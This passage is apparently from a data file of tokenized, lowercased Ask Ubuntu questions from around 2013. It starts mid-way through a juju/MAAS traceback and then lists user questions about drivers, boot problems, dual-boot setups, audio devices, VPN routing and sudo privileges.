self.type , self.value , self.tb ) file `` /usr/lib/python2.7/dist-packages/juju/control/bootstrap.py '' , line 39 , in command yield provider.bootstrap ( constraints ) file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 1069 , in _inlinecallbacks result = result.throwexceptionintogenerator ( g ) file `` /usr/lib/python2.7/dist-packages/twisted/python/failure.py '' , line 389 , in throwexceptionintogenerator return g.throw ( self.type , self.value , self.tb ) file `` /usr/lib/python2.7/dist-packages/juju/providers/common/bootstrap.py '' , line 57 , in _launch_machine { `` machine-id '' : `` 0 '' , `` constraints '' : self._constraints } , master=true ) file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 1069 , in _inlinecallbacks result = result.throwexceptionintogenerator ( g ) file `` /usr/lib/python2.7/dist-packages/twisted/python/failure.py '' , line 389 , in throwexceptionintogenerator return g.throw ( self.type , self.value , self.tb ) file `` /usr/lib/python2.7/dist-packages/juju/providers/common/launch.py '' , line 64 , in run machines = yield self.start_machine ( machine_id , zookeepers ) file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 1069 , in _inlinecallbacks result = result.throwexceptionintogenerator ( g ) file `` /usr/lib/python2.7/dist-packages/twisted/python/failure.py '' , line 389 , in throwexceptionintogenerator return g.throw ( self.type , self.value , self.tb ) file `` /usr/lib/python2.7/dist-packages/juju/providers/maas/launch.py '' , line 40 , in start_machine instance_data = yield maas_client.acquire_node ( self._constraints ) file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 576 , in _runcallbacks current.result = callback ( current.result , *args , **kw ) file `` /usr/lib/python2.7/dist-packages/juju/providers/maas/maas.py '' , line 95 , in _process_error raise providererror ( error.response ) juju.errors.providererror : no matching node is available . 2013-05-01 11:52:02,444 error traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 422 , in errback self._startruncallbacks ( fail ) file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 489 , in _startruncallbacks self._runcallbacks ( ) file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 576 , in _runcallbacks current.result = callback ( current.result , *args , **kw ) file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 1127 , in gotresult _inlinecallbacks ( r , g , deferred ) -- - < exception caught here > -- - file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 1069 , in _inlinecallbacks result = result.throwexceptionintogenerator ( g ) file `` /usr/lib/python2.7/dist-packages/twisted/python/failure.py '' , line 389 , in throwexceptionintogenerator return g.throw ( self.type , self.value , self.tb ) file `` /usr/lib/python2.7/dist-packages/juju/control/bootstrap.py '' , line 39 , in command yield provider.bootstrap ( constraints ) file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 1069 , in _inlinecallbacks result = result.throwexceptionintogenerator ( g ) file `` /usr/lib/python2.7/dist-packages/twisted/python/failure.py '' , line 389 , in throwexceptionintogenerator return g.throw ( self.type , self.value , self.tb ) file `` /usr/lib/python2.7/dist-packages/juju/providers/common/bootstrap.py '' , line 57 , in _launch_machine { `` machine-id '' : `` 0 '' , `` constraints '' : self._constraints } , master=true ) file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 1069 , in _inlinecallbacks result = result.throwexceptionintogenerator ( g ) file `` /usr/lib/python2.7/dist-packages/twisted/python/failure.py '' , line 389 , in throwexceptionintogenerator return g.throw ( self.type , self.value , self.tb ) file `` /usr/lib/python2.7/dist-packages/juju/providers/common/launch.py '' , line 64 , in run machines = yield self.start_machine ( machine_id , zookeepers ) file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 1069 , in _inlinecallbacks result = result.throwexceptionintogenerator ( g ) file `` /usr/lib/python2.7/dist-packages/twisted/python/failure.py '' , line 389 , in throwexceptionintogenerator return g.throw ( self.type , self.value , self.tb ) file `` /usr/lib/python2.7/dist-packages/juju/providers/maas/launch.py '' , line 40 , in start_machine instance_data = yield maas_client.acquire_node ( self._constraints ) file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 576 , in _runcallbacks current.result = callback ( current.result , *args , **kw ) file `` /usr/lib/python2.7/dist-packages/juju/providers/maas/maas.py '' , line 95 , in _process_error raise providererror ( error.response ) juju.errors.providererror : no matching node is available . 2013-05-01 11:52:02,444 error no matching node is available . any thoughts ?
289237	backlight control keys with nvidia driver work sometimes	i 've got a vaio s11 laptop with nvidia 310m graphics running ubuntu 13.04 with nvidia graphics driver ( nvidia-310 ) . backlight control started working since i created a .conf file in /usr/share/x11/xorg.conf.d with lines : section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' option `` registrydwords '' `` enablebrightnesscontrol=1 '' endsection keyboard backlight control ( fn+f5/fn+f6 ) either works from the system startup time or does not at all ( after reboot it can start working again ) . slider in the system settings always works fine . how do i fix keyboard control ?
289244	problem with ubuntu software center after installing gnome	i recently decided to install gnome 3.8 on my ubuntu 13.04 system , but doing so caused a problem with ubuntu software center . the left side of the window , displaying all the available software categories , is completely unreadable ! is there any way to fix this ?
289245	tried opening some windows programs with wine , now they wo n't open in windows ?	i did try to wine e-sword . that did not work , so i am back at windows 7 and e-sword will not open there .
289247	how to recover after ubuntu freeze on boot after installing broadcom sta driver	i have installed ubuntu 12.04 on bootcamp of my early 2011 macbook pro using the ubuntu windows installer . the wifi did not work and follow this instruction ( although for quantal ) to fix it https : //help.ubuntu.com/community/macbookpro8-2/quantal that did not fix the problem and i then relized the additional hardware is suggesting the broadcom sta driver so i updated and restarted it to work and now my screen freeze on boot . it just goes all purple and sits there . for me that i realized what grub is in the last 30 min , i do not know how to fix this . the recovery mode load busybox and do n't know what to do with it . how can i remove that driver without the live cd thing ?
289248	keyboard media volume control not working	im having a bit of an issue with my volume keys . they worked fine , until i recently updated ( kernel , etc ) and installing ati latest driver . the update was a standard update : apt-get update , apt-get upgrade and the ati catalyst drivers installed where : amd-catalyst-13.4-linux-x86.x86_64 i made both installs , a reboot after each one.. but didnt tried volume keys.. so i dont really know which one made the media keys stop working . btw , im running ubuntu 12.04 with standard unity interface . a bit of info : lsusb bus 004 device 002 : id 046d : c517 logitech , inc. lx710 cordless desktop laser the keyboard has 2 sets of media keys , volume up , volume down , mute . and aside , next track , play/pause , next track . the second set works ok , i can pause , skip , etc ... but the volume and mute keys are not responding . the output of `` sudo showkeys '' lists the not working keys as key 115 , 114 and 113 . the configuration on system > keyboard > shortcuts is configured fine apparently.. can anyone point me in the right direction ? please let me know if i can get you guys any more info.. btw , manual control works fine , i mean with the volume applet i can control volume .
289253	how to get pearson etext to work on ubuntu ? ( 13.04 )	upon upgrading , i am having trouble getting pearson etextbooks to display on ubuntu 13.04 . when trying to access the web textbook on ubuntu firefox , it gives `` error # 2046 '' . if i try using wine , it complains about a missing flash plugin . naturally , the flash plugin refuses to install—the installer either fails to launch , or says `` a serious error occured , and the installer must now close '' . winetricks flash does not work ; there is a working script that can be found on the internet , but it causes wine firefox to get extremely slow and freeze whenever the pearson website is opened . it used to work on 12.10 , but not on 13.04 . i can not download wine chrome—the chrome download page always redirects you to the ubuntu download . i have tried removing the spaces in my firefox profile directories ( there were none already ) , and unchecking the `` local storage '' flash option suggested on many other sites—that did n't work either .
289255	do n't show thunderbird in alt+tab menu	when i switch between tabs with alt+tab , i do n't want to see thunderbird . is it possible ?
289258	13.04 stopped playing streams in rhythbox and totem	the stream does not play in rhythmbox nor totem . it played fine before the upgrade ; it looks like a regression from an earlier report about the same . the streams play in mplayer and play fine when downloaded with wget and then opened in totem . i suspect there is either a bug in gstreamer , or i am missing some component of gstreamer , somehow . is this a known bug : if so where can i help debug it ? what part , package or addong for gstreamer manages streaming of mp3 ? is rhythbox using gstreamer at all ? if not , i am probably looking in the wrong direction .
289260	upgrade to 13.04 , user picture shows up on lightdm . can i change it ?	so , i recently upgraded my xubuntu to 13.04 , and afterwards i noticed that there is now a picture of me on the lightdm login screen . i have no idea where this picture came from , i do n't remember it being taken . i guess it was asked for when i set up the account . long time ago now . anyway , i was wondering whether it was possible to change this picture ... i do n't really like it .
289276	can the bootloader be stored outside the hdd ?	if the ubuntu boot loader is stored on the hard drive , is there an alternative to loading the boot loader from the hard drive ? can it be stored on alternate storage such as a cd or even an external hard drive and used to boot the user 's system ?
289277	can i sync a folder once a day rather than immediately	i want to use it to do a nightly `` backup '' of files from a computer where the files will change several times a day but only want to backup once a night . is this possible ?
289279	what are the design guidelines for appindicator icons ?	i am creating a unity appindicator using python + pygobject , but i wish for it 's icon to be in standard ubuntu style . where can i find appropriate guidelines for using colours ( or is it just white/transparent ? ) , or at least icons of standard appindicators ? that is about 13.04 , as i suppose , the icon style wo n't change much after this version ( though we 'll see ) . also , i have a question about setting my icon to my indicator . if i put it in the same folder , as the .py file , how should i refer to it in the code ?
289284	enable global terminal movement keys	in terminal i can use : ctrl + h → backspace ctrl + m → return ( enter ) ctrl + f → forward ctrl + b → backward ctrl + n → next ctrl + p → previous ctrl + a → beginning of line ( home ) ctrl + e → end of line ( end ) and i would like to have these shortcuts work globally . so for instance i could use them while writing and editing this question ! i have had a look around the internet and it seems that i should be using xmodmap for this . however i ca n't work out how to map ctrl key events . shift + key and alt + key events seem straight forward enough , but i ca n't work out how to incorporate ctrl .
289292	ffmpeg / avconv follow_mouse not working ?	i 'm trying the option -follow_mouse with both ffmpeg and avconv and i ca n't make it work . avconv version 0.8.6-6:0.8.6-1ubuntu2 tells me : option follow_mouse not found . ffmpeg version git-2013-01-05-6717d1a , does n't complain , but the outline does n't follow the mouse , and the resulting video is also not moving . my full command line is the following : ffmpeg -f alsa -i pulse -f x11grab -show_region 1 -r 10 -s 960x540 -i :0.0+10,200 \ -acodec pcm_s16le -qscale 0 -follow_mouse 100 screencast.avi how to make it work ? am i doing something wrong , or should i get a different version ?
289293	xorg-video-abi-13 dependency problem	i 'm trying to install the ati driver for my probook 4540s ( 3000/7650m ) according to instructions given in how do i get amd/intel hybrid graphics drivers working ? . after execute the following command : sudo dpkg -i xserver-xorg-video-intel_2.21.6-0ubuntu4_amd64.deb i get error : dpkg : dependency problems prevent configuration of xserver-xorg-video-intel : xserver-xorg-video-intel depends on xorg-video-abi-13 ; however : package xorg-video-abi-13 is not installed . dpkg : error processing xserver-xorg-video-intel ( -- install ) : dependency problems - leaving unconfigured what do i have to do to install the ati driver properly ? are there any dependencies to use during installation ?
289294	ubuntu trouble with usb ports	i just installed ubuntu 13.04 ( not , i 'm new to linux in general , but i 've also tried to install 12.10 back before 13.04 ) , and the usb ports are n't working . i had this problem in 12.10 as well . all of them ( even the front two usb 3.0 ports on the front of my case ) except the two usb 3.0 on my mobo ( ga-990fxa-ud3 ) do not work . is there a way to fix this in ubuntu , or is it a problem with my hardware ? cpu is an fx-8350 in case it 's relevant .
289296	multiple programs trying to play sound	multiple programs ca n't play sound at the same time . if i start up world of warcraft ( through wine ) with something already playing sound then it can not play sound . works the other way round too . mumble lets me play sound at the same time though . some programs like mpd/ncmpcpp wo n't play sound after i 've exited world of warcraft . i do n't know if it 's world of warcraft causing all the problems but that seems to be whenever the issue occurs . please let me know if you would like to see the output of any commands and i will update the thread with them .
289304	/casper/initrd.lz : read error when booting from live usb	when i try to boot 13.04 from a live usb it immediately goes to an error message that says /casper/initrd.lz : read error @ 21612272 i tried redownloading the iso and putting it on a different usb stick but i got the same error . i currently have windows 7 installed and i planned on dual booting it with ubuntu but i am unable to do anything .
289305	data deleting from shared drive	i am currently running a dual boot windows 7 and ubuntu 12.04 system . thisis the first time that i have set up a dual boot and i may have gone wrong . firstly , booting into either os is fine . however , if i been using ubuntu and then boot into windows ( reboot or shutdown and restart ) the first boot always blue screens and reboots . the next windows boot proceeds as normal . how do i repair the boot loader so this no longer happens ? secondly and more importantly , i have a shared drive which i would like to use to share data between the windows and ubuntu . this shared drive and its data can be seen by both windows and ubuntu . files etc stored in thisn drive from windows are visable in ubuntu . however , any files/folders etc copyed to this drive while in ubuntu disappear when machine is rebooted and are no longer visible in ubuntu or windows . this only occurs when files are saved to the drive while running ubuntu . can this be fixed ? i would appreciate any help regards brian
289306	my laptop wont boot in either windows 7 or ubuntu 13.04 after dual-boot installation	i am a fan of ubuntu products and not the newest in dealing with its desktops and servers , but i have come across a huge problem . when ubuntu 13.04 came out and claimed it supported uefi , i immediately got it for my laptop , and asus k55n . i tried to install it by manualy selecting the swap , bios , and root partitions so i can keep it organized with windows 7 home premium . so after it finished installing , when i rebooted , it said there was no boot-able device installed . i assumed it was because of uefi so i disabled it and still there was no booting option . i then looked on-line and tried boot repair on the livecd but none of it worked . i am out of ideas and i need help . if anyone can find a way to fix this without deleting windows 7 or its files , i will be grateful . here are my partitions : /dev/sda1 ntfs 172854mb windows 7 ( loader ) ( my c : drive ) /dev/sda2 ext4 296351mb ubuntu 13.04 ( my d : drive ) /dev/sda3 ntfs 26843mb windows recovery environment ( loader ) /dev/sda4 biosgrub 148mb /dev/sda5 swap 195mb again any help would be appreciated , thank you .
289308	computer wakes up to a black screen in ubuntu 12.04 dual booted with linuxmint 14 cinnamon on separate hdd	3 days now i have not been able to boot my computer to my os due to a black screen . wow , and i really did love this os at one time . i 've been trying to get pass the black screen since yesterday morning . can someone at least tell me how to get it up ? so i can at least see the screen again ? i never had one problem with 12.04 until i hit 12.04.2 and 13.04 . i 've never had this problem until recently and do n't know if it has something to do with ubuntu being on a sata hdd and linuxmint 14 on a ide hdd . when i move my mouse to awake the computer , the monitor light goes from orange to blue so i know the monitor comes on - however the screen is solid black . sometimes when i restart i watch my hdd light when it stops blinking . i 'm guessing its at grub menu so i press enter , then it will come to my first option to allow to sign in which i can see , and sometimes it does n't . i have hdmi , but i 'm running dvi . i ca n't see my first option in grub , i just press enter , and then i see my sign in screen . after several times of pushing the restart button on my computer it finally comes up , but it takes quite a few tries . when i am on linuxmint hdd , the same thing happens there as well . i have a radeon hd 6500 graphics card and tried several different drivers ( open source and proprietary ) , but nothing fixed it . i am now using amd catalyst 13.4 driver , which works great , except for this issue . i 've researched google and tried a few things but nothing works and this is getting very old fast . does anyone know how to fix this ? if the computer goes to sleep and i wake it within 3 minutes , it comes up fine , with no issues , but if it goes to sleep for awhile , an hour or so , it has this issue . i am using the 3.5.0-28-generic kernel as well as the newest quantal x stack . checking my bios - i am already set to `` s3 '' . i 'm not really sure i want to suspend to hard drive since suspend to ram was working . i have also tried the `` acpi_sleep=old_ordering '' trick in grub boot options to no avail . to add to this , when i added linuxmint , on second hdd i unplugged my sata hdd from computer that had ubuntu on it , then installed linuxmint 14 on the ide hdd . once installed , i then plugged my sata drive back up and ran sudo update-grub . as i 've been reading more on ubuntu 12.04.2 , i wonder if when my kernel and xorg stack updated to quantal if this is my issue ... is there a way to roll back to an older kernel to test this ? i ca n't remember correctly right now , but this issue might have started when i put linuxmint 14 on the ide hdd and thats equivalent to ubuntu 12.10 , right ? could this be the issue ? the new xorg and kernel ? although my boot priority in bios loads my sata drive which has 12.04 ubuntu on it first anyway , but also has been updated to the new quantal kernel . i set a link here to my xorg file , hoping it might help some as well . update 1 : i just tried to run memtest from grub menu , and i get an error `` too small lower memory ( 0x99100 > 0x99800 ) '' . the test does n't start and i have 2 entries of memtest in grub2 . i am running 8gigs of ram , gigabyte socket 775 board , quad-core setup . i 'm not having any crashes , my memory shows up in system monitor . i 've just researched this issue . seems its a bug , but would it affect my s3 setting in bios ? update 2 : just switched from s3 to s1 . it does n't work neither . i 've noticed in my xorg log file that i 'm receiving some errors ( ee ) open /dev/dri/card0 : no such file or directory , , , , , ( ee ) open /dev/fb0 : no such file or directory , , , , , ( ww ) falling back to old probe method for fglrx , , , , , , , ( ww ) fglrx : no matching device section for instance ( busid pci:0 @ 1:0:1 ) found , , , , , , , ( ww ) falling back to old probe method for vesa , , , , , , , , ( ww ) falling back to old probe method for modesetting , , , , ( ww ) falling back to old probe method for fbdev , , , , , ( ww ) fglrx ( 0 ) : board is an unknown third party board , chipset is supported ... ... i have also upgraded to 13.04 and still fighting this issue . i 've tried nomodeset in grub and yet [ nothing is working ] ( my xorg.conf ) . update 3 : today , as usual , when my computer rebooted and came back up , i could n't see anything but a black screen . not even bios or grub . however , i assumed that ubuntu was highlighted in the grub and pressed enter . then i see my hdd light lit up , then hear the ubuntu chime . i attempted several reboots , for about 30 minutes . then i become frustrated on last attempt and did this - while my computer was running i unhooked my dvi cable from the graphics card and then hooked it back up . and all of a sudden i no longer had the black screen . i could see my desktop finally . does this help anyone out there to help me fix this issue ? another thing i 've noticed is my linuxmint hdd is /sda1 , while my ubuntu sata hdd is /sdb . should the grub be on /sda1 ? this is my syslog picture .
289310	is there any rom for huawei u8800+/u8800pro	i am very excited that ubuntu has published a cellphone rom , but it seems only avaiable on galaxy nexus & & nexus , i do not have these kind of phone , only a huawei u8800+/u8800pro is avaiable , so i want to ask if the rom is avaiable for huawei , or how long will this rom be avaiable for this device ? thanks a lot ! !
289311	what is ubuntu touch 's policy on protection of qml/js source ?	my friends and i wish to write mobile apps for ubuntu touch as a business venture when it releases . however , each and every bit of the source needs to be protected for the business prospects to work . what are the proposed solutions for qml and js files 's source protection by ubuntu touch ? thank you .
289312	can not use bash tab complete in tmux	i just install tmux on ubuntu 12.04 lts and it throws me this error when i try to use tab completion for simple commands like 'cd ' or 'mv ' in the /etc/bash_completion file . command substitution : line 74 : syntax error near unexpected token `done' however , i can use tab completion in my normal terminal or in byobu . has anyone else encountered this issue or knows how to fix it ? i do have the bash completion file included in my .bashrc .
289313	installing ubuntu for mac , on a usb-drive	after following all the steps on how to install ubuntu [ 12.04 ] on a flash drive , i get the error that the usb stick can not be read . options are to format , ignore or reject it . also tried to shutdown and start through the usb-stick , but it did n't appear at the alt/option startup . am i doing something wrong , or is there an error ? using snow leopard 10.6.8
289316	can not install matlab r2013 on ubuntu 12.10	i tried running install from the files that i had downloaded ( currently located in my documents folder ... should that be changed ? ) but the installer refused to install my files in a folder , giving me a `` failure to create folder '' error . i 've also tried gksu ./install via terminal in my directory where all the installation files are but i still get the same error of `` failure to create folder '' and `` no products message - you elected not to overwrite the contents of the current installation folder . if you do not want to overwrite the contents in this folder , provide a new folder name . '' this folder is empty and i 've even tried altering the file names slightly ( i.e . `` matlab1 '' instead of `` matlab '' ) in an attempt to confuse the installer into letting me get matlab but to no avail .
289320	ca n't ssh into server over internet while server is connected to vpn	so i have transmission running on my ubuntu 13.04 server that is connected to a vpn via openvpn . the problem is i want to be able to access the server over the internet , but it wo n't work while the vpn is running . for example , i want to be able to connect to a minecraft server running on the server from outside my network . i have port forwarding set correctly , however it times out while connecting to the server over the internet while the vpn connection is active on the server . i only need transmission routing through the vpn , is there a way to do this ? thanks !
289321	listing files in a directory without listing subdirectories and their contents in that directory	i want to create a list of all the files in a directory , without listing any of the subdirectories that reside in that same directory , and print that list to a new file . ls -d * > filelist will create a list of all the files in the current directory , but it also lists the subdirectories in the current directory . i tried the find command using the -maxdepth 1 option - however , the output format is a problem as find also prints out the path along with the file names . if anyone can please tell me perhaps another command or options to use that will produce an output list of just the files in a directory and not the names of the subdirectories or their contents , i would appreciate it . thank you , janet
289322	just installed ubuntu , no proprietary drivers	i just installed ubuntu but it is not detecting my wireless internet connection . in the terminal i ran ping google.com but it returned something like `` unknown host '' . i saw in another thread someone complained about ubuntu not automatically detecting available connections and one of the responses suggested a proprietary driver was disabled but when i checked mine , it said there were none installed at all . i installed ubuntu without a connection because it did n't detect the connection then either so i 'm assuming this could possibly be part of the issue . how can i resolve this without an internet connection ? is there anything like packages i can download onto an external drive ( cd , usb , etc . ) and manually extract myself ? edit lspci | egrep -i `` network|wireless|ethernet '' returns this : 05:00.0 network controller : broadcom corporation bcm4311 802.11b/g wlan ( rev 01 ) 08:00.0 ethernet controller : broadcom corporation bcm4401-b0 100base-tx ( rev 02 )
289324	how do i start keepass2 ( portable ) from nautilus in ubuntu 13.04 ?	i have keepass2 installed on a usb flash drive . in ubuntu 12.04 all i had to do to start is was right click keepass.exe and select open with mono runtime . in 13.04 i only have the options of opening with archive manager or wine . i have mono installed and can start keepass from the command line with either : keepass.exe or mono keepass.exe i ca n't start keepass from a script on the flash drive because it is not possible to make it executable .
289328	show applications problem	after some difficulty i 've got ubuntu-gnome 13.04 32 bit installed in virtualbox on windows7 professional . when i click on show applications all i get is a list of topics on rhs of screen . it did work on first install . any ideas on how to get it back , i do n't want to re-install and even if i did , no assurance it would n't crop up again .
289330	make a usb device show up as an input and output device	what am i attempting to do ? i am trying to make my line6 toneport ux1 ( hooked up via usb ) an output and input device at the same time . why am i trying to do this ? for those of you that do n't know , line6 toneport ux1 is an interface/intermediary that allows any instrument and/or microphone hooked into it to be sent to a software effects board and/or to another program ( e.g . ableton live ) for recording . what have i done ? first , i went to the fabled ubuntu sound control panel to change my audio devices . toneport shows up in the output tab , but not in the input tab . hmmm ... second , i attempted to use pulseaudio volume control ( yes , i referred to this question ) to pass an output device as an input device . this was not successful as it did not actually change the properties of the usb device nor was i able to hear myself speak through the microphone or my classical guitar . third , i attempted to use alsamixer . by pressing f6 , i was able to switch the sound card from the default intel sound card to the line6 toneport . the mixer looks like the following for playback ... when i change the middle channel to `` instrument '' and turn the volume up on my toneport , i am able to hear my classical guitar . success ! ... sort of . however , when i press f4 to display capture capabilities , the following pops up ... aplay -l **** list of playback hardware devices **** card 0 : intel [ hda intel ] , device 0 : vt1708s analog [ vt1708s analog ] subdevices : 0/1 subdevice # 0 : subdevice # 0 card 0 : intel [ hda intel ] , device 2 : vt1708s hp [ vt1708s hp ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : toneportux1 [ toneport ux1 ] , device 0 : toneport ux1 [ toneport ux1 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 arecord -l **** list of capture hardware devices **** card 0 : intel [ hda intel ] , device 0 : vt1708s analog [ vt1708s analog ] subdevices : 2/2 subdevice # 0 : subdevice # 0 subdevice # 1 : subdevice # 1 card 1 : toneportux1 [ toneport ux1 ] , device 0 : toneport ux1 [ toneport ux1 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 lsusb -v -d 0e41 : could n't open device , some information will be missing device descriptor : blength 18 bdescriptortype 1 bcdusb 1.00 bdeviceclass 255 vendor specific class bdevicesubclass 0 bdeviceprotocol 0 bmaxpacketsize0 8 idvendor 0x0e41 line6 , inc. idproduct 0x4141 bcddevice 0.01 imanufacturer 1 iproduct 2 iserial 0 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 124 bnuminterfaces 1 bconfigurationvalue 1 iconfiguration 0 bmattributes 0xa0 ( bus powered ) remote wakeup maxpower 498ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 2 binterfaceclass 255 vendor specific class binterfacesubclass 0 binterfaceprotocol 0 iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x01 ep 1 out bmattributes 1 transfer type isochronous synch type none usage type data wmaxpacketsize 0x0000 1x 0 bytes binterval 1 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x82 ep 2 in bmattributes 1 transfer type isochronous synch type none usage type data wmaxpacketsize 0x0000 1x 0 bytes binterval 1 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 1 bnumendpoints 2 binterfaceclass 255 vendor specific class binterfacesubclass 0 binterfaceprotocol 0 iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x01 ep 1 out bmattributes 1 transfer type isochronous synch type none usage type data wmaxpacketsize 0x00c0 1x 192 bytes binterval 1 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x82 ep 2 in bmattributes 1 transfer type isochronous synch type none usage type data wmaxpacketsize 0x00c8 1x 200 bytes binterval 1 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 2 bnumendpoints 2 binterfaceclass 255 vendor specific class binterfacesubclass 0 binterfaceprotocol 0 iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x01 ep 1 out bmattributes 1 transfer type isochronous synch type none usage type data wmaxpacketsize 0x00b4 1x 180 bytes binterval 1 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x82 ep 2 in bmattributes 1 transfer type isochronous synch type none usage type data wmaxpacketsize 0x00bc 1x 188 bytes binterval 1 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 3 bnumendpoints 2 binterfaceclass 255 vendor specific class binterfacesubclass 0 binterfaceprotocol 0 iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x01 ep 1 out bmattributes 1 transfer type isochronous synch type none usage type data wmaxpacketsize 0x0120 1x 288 bytes binterval 1 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x82 ep 2 in bmattributes 1 transfer type isochronous synch type none usage type data wmaxpacketsize 0x012c 1x 300 bytes binterval 1 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 4 bnumendpoints 2 binterfaceclass 255 vendor specific class binterfacesubclass 0 binterfaceprotocol 0 iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x01 ep 1 out bmattributes 1 transfer type isochronous synch type none usage type data wmaxpacketsize 0x010e 1x 270 bytes binterval 1 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x82 ep 2 in bmattributes 1 transfer type isochronous synch type none usage type data wmaxpacketsize 0x011a 1x 282 bytes binterval 1 if that was n't enough to drive the point home , i opened up gearbox ( the software used for moulding guitar tones and whatnot ) only to be disappointed by a blinking usb symbol in the bottom of the window . that indicated that toneport was not detected nor plugged in . so what the heck is my question again ? how do i change the rules , properties or whatever you 'd like to call it to make toneport an output and input device at the same time ? is this even possible ? solutions could be done programatically through terminal , through the use of a gui ... i am open to anything . other resources installation instructions
289333	latitude d630 fan not working	i have a del latitude d630 that the fan never turns on . i tried fancontrol . pwmsensors doesnât show anything .
289335	kernel update *breaks* oracle virtual box frequently - how do i avoid this ?	i 'm using desktop 12.04 . i run windows xp for testing lazarus and the guest os is on virtual box . every few times a month , the ubuntu update causes the virtual box to stop working . i.e. , when i run the virtual box , it insists that i recompile some kernel module . well , it 's no big deal , but is there a way to avoid this ? ca n't it be automated or not stop working ? this development machine hardly shuts off and having to reboot the guest os means a lot of time wasted because there are so many files/sessions open . thanks !
289337	how can i change file association globally ?	gedit is set by default to open about any source file . i 've gone through the file properties and changed default application to vim for c and c++ files . i 'd need to do this for any source file i open now , for python files , for text files , for ruby , any , since gedit is set to open all of them . how can i change this to open with vim without going the hassle of setting `` open with '' one by one ?
289347	how do i install ubuntu onto a macbook running osx without a cd or usb of ubuntu ?	i have a macbook pro running osx mountain lion presently . i downloaded the desktop version of ubuntu ( 12.04.2 ) which is a .iso application . i 'm not amazing with computers , and am having extreme difficulty figuring out how to install ubuntu , whether it 's dual boot or a full install . can someone tell me how exactly i go about doing this ? -brad
289351	nautilus 3.6 - look for filenames in current directory before general search	is there a way to set the new nautilus in ubuntu 13.04 to have an old behaviour i liked , namely : type something an item matching that name will be selected ( pretty much like using the tab key in a terminal ) this used to be virtually instant and quite convenient , but now it does a deep search across a variety of parameters when you start typing . the deep search is useful , but by far the more frequent task is to select something within the current directory by name , which the old function satisfied perfectly . is there a way to restore this behaviour ? i could n't find an option in preferences . if possible , i 'd like to avoid a roll-back as i hate to fight progress , but if that 's the only option i 'll take it .
289354	i cant boot windows !	okay , i used an iso to put a file called artistx onto a disk , and then ran the installer . artistx is apparently a different os and downloaded ubuntu 12.1 . so while trying to open ubuntu , i got the error that gave me the low graphics card error . i did what was supposed to fix this , but my terminal would n't work with anything or do anything to fix this after searching the error . i got the error that my harddrive was full and i had no memory left ( for some reason artistx has my memory at 11gb/11gb even though i have a 650 gb hard drive that ubuntu wo n't use because it 's hp or something ) . i do n't have a windows recovery disk , and im not sure what else to do . when grub loads , it gives a list of ubuntu , memory test , and a windows vista with sda 1 and sda 2 by them . i can email a picture if this to you if you 'd like . if you could help in any way , it would be so helpful . thank you !
289357	how can upgrade ubuntu 12.04.2 lts to ubuntu 13.04	i want to upgrade ubuntu 12.04.2 lts to ubuntu 13.04 with out formatting existing one . please guide me .
289358	no such partitions grub rescue >	i installed ubuntu 12.10 on my desktop , to try it out.. it worked fine . now i wanted to install windows 7 , inserted win 7 dvd formatted all the partitions , its not successfully installed . now when i tried to boot it shows `` no such partitions grub rescue > `` error . help me to install windows 7 ?
289364	ubuntu 13.04 wake up hibernate suspend black display on nokia booklet 3g	lubuntu 13.04 runs amazing on the nokia booklet 3g with a ssd , the only issue i got is the wake up/suspend/hibernate not working properly i.e . the display stays blank or black . any idea how to fix it ? lubuntu 12.10 had no such issues.\ thanks a mil .
289368	installation and disk partition	when i tried to install ubuntu 12.10 on my laptop some questions were asked regarding drives ( i think so ) . what do they mean ? ntfs /dev/sda/ /dev/sda1/ /
289371	broken libc.so.6 link	i accidentally broke the symbolic link libc.so.6 by moving it . intending to back it up and replace it with a link to a newer version . that was a really bad idea . now i get these errors when running commands in the bash shell ls : error while loading shared libraries : libc.so.6 : can not open shared object file : no such file or directory mv : error while loading shared libraries : libc.so.6 : can not open shared object file : no such file or directory is there a way to fix this without booting from a livecd ?
289375	what is the right way to gain sudo privileges	i have just created a new rackspace cloud server and i need to set it up . i created a new user with the adduser command and currently the user is only in a group with the same name . for the sudo privileges what should i do : use visudo to edit /etc/sudoers file → add the user to the sudo group → create a new admin group , add it to sudoers , and then add the user to this group → i can not decide what 's the right way to do this . why should i choose one over other ?
